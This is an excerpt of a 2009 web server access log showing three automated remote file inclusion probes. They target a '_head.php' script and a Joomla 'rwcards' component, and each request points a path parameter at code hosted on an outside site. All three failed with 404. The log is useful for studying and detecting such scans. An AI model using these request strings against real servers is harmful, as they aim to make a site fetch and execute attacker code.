218.38.243.71 - - [21/Jun/2009:09:23:23 -0700] "GET ///_head.php?_zb_path=http://samhwagolf.com/zb41//latest_skin/default/default_bbs/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.243.71 - - [21/Jun/2009:09:23:23 -0700] "GET /logs/access_090418.log////_head.php?_zb_path=http://samhwagolf.com/zb41//latest_skin/default/default_bbs/1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.51.133.202 - - [21/Jun/2009:09:23:29 -0700] "GET /logs/access_080222.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
